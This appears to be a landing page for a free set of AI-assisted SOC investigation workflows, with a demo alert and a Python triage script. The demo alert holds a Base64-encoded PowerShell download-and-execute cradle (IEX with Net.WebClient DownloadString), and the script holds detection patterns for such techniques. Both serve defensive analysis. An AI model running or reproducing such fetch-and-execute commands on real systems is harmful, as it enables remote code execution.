Paste alerts, logs, or phishing emails → follow structured steps → generate a SOC investigation summary in seconds.
Structured investigation workflows covering the most common SOC alerts. Designed for analysts working with SIEM, EDR, and cloud security alerts.
Paste any security alert, log entry, phishing email, or suspicious command. Works with alerts from SIEM, EDR, email security, or firewall logs.
Structured workflows guide you through decoding, behavior analysis, threat mapping, and investigation checklists — the same process used by experienced SOC analysts.
Produce a ready-to-paste SOC investigation summary including severity, MITRE ATT&CK mapping, IOCs, and recommended actions.
No signup required. Works with ChatGPT, Claude, or any LLM.
Jump directly to the right workflow
Used by SOC analysts to investigate:
Investigate network traffic anomalies and suspicious connections using structured AI analysis of VPC flow logs.
Step-by-step workflow to analyze suspicious emails, verify sender authenticity, and identify phishing indicators.
Efficiently triage security alerts using AI-assisted analysis to determine severity and next actions.
Quickly understand unfamiliar security alerts with context-aware explanations and response guidance.
Systematically analyze suspicious URLs to identify phishing attempts and malicious infrastructure.
Decode obfuscated PowerShell, identify attacker behavior, and generate a SOC-ready investigation summary.
Analyze suspicious logins, MFA fatigue, and account takeover activity step-by-step.
Assess ransomware indicators, identify blast radius, and generate a management-ready incident report.
See how an analyst turns a raw alert into a structured SOC report in minutes.
powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcA

ALERT: Suspicious PowerShell Execution
SEVERITY: High
CONFIDENCE: Medium
KEY INDICATORS:
- Base64 encoded command detected
- Possible payload download from external server
- ExecutionPolicy bypass attempted
RECOMMENDED ACTIONS:
1. Decode and analyze the Base64 command
2. Review parent process and execution context
3. Investigate outbound network connections
DISPOSITION: Needs Investigation
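The decoding and indicator-matching step behind the demo above, as an added example that is not SOC.Workflows' own code: it decodes the -EncodedCommand argument (Base64 of UTF-16LE text), scans both the outer command line and the decoded payload against an assumed indicator list, and returns a summary shaped like the ALERT block. The sample command line is the one shown on the page, joined into a single token; the indicator patterns and severity weights are assumptions for this example.

```python
import base64
import re

# Constructed sample: the command line shown on the page, with its Base64
# argument joined into one token (the page wraps it for display).
SAMPLE_CMDLINE = (
    "powershell.exe -EncodedCommand "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
    "IABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
    "LgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcA"
)

# Assumed indicator list for this example (not the site's ruleset):
# (regex, description for the report, severity weight).
INDICATORS = [
    (r"\b(IEX|Invoke-Expression)\b", "Invoke-Expression used to run constructed code", 2),
    (r"New-Object\s+Net\.WebClient", "WebClient object created (download capability)", 2),
    (r"\.Download(String|File)\b", "Possible payload download from external server", 2),
    (r"-(ExecutionPolicy|ep)\s+Bypass", "ExecutionPolicy bypass attempted", 1),
    (r"-(WindowStyle|w)\s+Hidden", "Hidden window requested", 1),
]
ENC_FLAG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def decode_encoded_command(token: str) -> str:
    """Decode a -EncodedCommand argument (Base64 of UTF-16LE). Wrapping
    whitespace is removed and '=' padding restored, so a truncated capture
    such as the page's sample still decodes as far as the data allows."""
    clean = re.sub(r"\s+", "", token)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean, validate=True).decode("utf-16-le", errors="replace")


def triage(cmdline: str) -> dict:
    """Decode the command and build a summary shaped like the page's ALERT block."""
    match = ENC_FLAG.search(cmdline)
    decoded = decode_encoded_command(match.group(1)) if match else ""
    text = cmdline + "\n" + decoded  # scan the outer flags and the decoded payload
    hits = [(d, w) for pat, d, w in INDICATORS if re.search(pat, text, re.IGNORECASE)]
    score = sum(w for _, w in hits)
    indicators = ["Base64 encoded command detected"] if match else []
    indicators += [d for d, _ in hits]
    return {
        "decoded": decoded,
        "severity": "High" if score >= 4 else "Medium" if score >= 2 else "Low",
        "indicators": indicators,
        "iocs": URL_RE.findall(decoded),  # any URL in the payload is a candidate IOC
        "disposition": "Needs Investigation" if hits else "Likely Benign",
    }
```

For the page's sample, `triage(SAMPLE_CMDLINE)` decodes to `IEX (New-Object Net.WebClient).DownloadString` (the capture is truncated before the URL, so no IOC is extracted) and rates it High.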
SOC.Workflows started from a simple frustration — AI tools are powerful, but most security analysts don't know how to prompt them effectively for real investigation work.
These workflows are different. Each one is structured, step-by-step, and built around real SOC scenarios. Not generic prompts. Not marketing fluff. Just guided inputs that help you investigate faster and document better.
Currently free. Always will be for defenders.
Questions, feedback, or just want to say hello — reach us at gauravkundu12@gmail.com
Get notified when new workflows are added. No spam. Unsubscribe anytime.